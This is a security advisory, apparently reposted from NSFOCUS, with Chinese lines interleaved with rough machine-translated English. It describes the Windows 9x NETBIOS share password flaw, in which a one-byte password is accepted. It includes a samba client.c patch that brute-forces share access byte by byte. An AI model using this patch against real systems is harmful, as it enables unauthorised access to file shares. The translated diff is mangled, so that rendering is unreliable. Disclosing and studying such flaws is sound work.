NSFOCUS 安全小组发现了微软Windows 9x NETBIOS协议口令校验部分存在一个安全漏洞。 NSFOCUS Security Team discovered a Microsoft Windows 9x NETBIOS password verification part of the agreement there is a security vulnerability. 这个漏洞允许任意用户访问Windows 9x文件共享服务,即使此共享目录已经受到口令保护。 This vulnerability allows any user to access Windows 9x file-sharing services, even if the shared directory has been password protected. 攻击者并不需要知道真实口令。 Attacker does not need to know the real password.
受影响的软件及系统:Microsoft Windows 95、Microsoft Windows 98、Microsoft Affected Software and Systems: Microsoft Windows 95, Microsoft Windows 98, Microsoft
Windows 98 Second Edition。 Windows 98 Second Edition. 不受影响的软件及系统: Microsoft Windows NT、Microsoft Affected Software and Systems: Microsoft Windows NT, Microsoft
Windows 2000。 Windows 2000.
漏洞分析: Vulnerability analysis:
Windows Windows
9x系统提供的文件和打印共享服务可以设置口令保护,以避免非法用户的访问。 9x system provides file and print sharing services, you can set password protection to prevent access to unauthorized users. 然而微软NETBIOS协议的口令校验机制存在一个严重漏洞,使得这种保护形同虚设。 However, Microsoft NETBIOS password verification mechanism of the agreement there is a serious flaw, so this protection useless. 服务端在对客户端的口令进行校验时是以客户端发送的长度数据为依据的。 Server in the client verify the password sent by the client when the length is based on data. 因此,客户端在发送口令认证数据包时可以设置长度域为1, 同时发送一个字节的明文口令给服务端。 Therefore, the client sends the password in the authentication packet length field can be set to 1, and sends a byte of plaintext password to the server. 服务端就会将客户端发来口令与服务端保存的共享口令的第一个字节进行明文比较,如果匹配就认为通过了验证。 Server will be sent to the client and server password sharing passwords to save the first plaintext byte comparison, if the match is considered by the validation. 因此,攻击者仅仅需要猜测共享口令的第一个字节即可。 Therefore, the attacker only needs to guess the password of the first to share one byte.
Microsoft Windows 9x 的远程管理也是采用的共享密码认证方式,所以也受此漏洞影响。 Microsoft Windows 9x also used for remote management of the shared password authentication, so it is affected by this vulnerability.
漏洞测试: Vulnerability testing:
下面提供一个简单的测试程序。 The following provides a simple test program.
您需要下载并修改Linux下的samba client(source/client/client.c)的源码: You need to download and modify under Linux samba client (source / client / client.c) source:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 --- Samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59
1999 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000 + + + Samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve @ @ -1961,12 +1961,22 @ @ Struct cli_state * do_connect (char * serve
DEBUG(4,(" session setup ok\n")); DEBUG (4, ("session setup ok \ n"));
+/* + / *
if (!cli_send_tconX(c, share, "?????", if (! cli_send_tconX (c, share, "?????",
password, strlen(password)+1)) { password, strlen (password) +1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c))); DEBUG (0, ("tree connect failed:% s \ n", cli_errstr (c)));
cli_shutdown(c); cli_shutdown (c);
return NULL; return NULL;
} }
+*/ + * /
+ +
+ password[0] = 0; + Password [0] = 0;
+ c->sec_mode = 0; + C-> sec_mode = 0;
+ do{ + Do {
+ +
+ password[0]+=1; + Password [0] + = 1;
+ +
+ }while(!cli_send_tconX(c, share, "?????", password, 1)); +} While (! Cli_send_tconX (c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n")); DEBUG (4, ("tconx ok \ n"));
临时解决方法: Workaround:
NSFOCUS建议您在没有获得并安装补丁程序之前,暂时关闭文件共享服务。 NSFOCUS recommend that you do not obtain and install a patch before, temporarily shut down file-sharing services.
解决方案: Solution:
我们已经将这个问题通报给了微软公司,微软已就此发布了一个安全公告(MS00-072) 以及相应补丁。 We have communicated to Microsoft this problem, Microsoft has released a security bulletin on this (MS00-072) and the corresponding patch.
您可以在下列地址看到微软安全公告的详细内容: You can see Microsoft security bulletin addresses the following details:
http://www.microsoft.com/technet/security/bulletin/ms00-072.asp http://www.microsoft.com/technet/security/bulletin/ms00-072.asp
英文版的补丁程序可以在下列地址下载: English version of the patch can be downloaded at the following address:
. Microsoft Windows 95:微软将会尽快提供补丁 . Microsoft Windows 95: Microsoft will provide patches as soon as possible
. Microsoft Windows 98 and 98 Second Edition . Microsoft Windows 98 and 98 Second Edition
. Microsoft Windows Me . Microsoft Windows Me
Tidak ada komentar:
Posting Komentar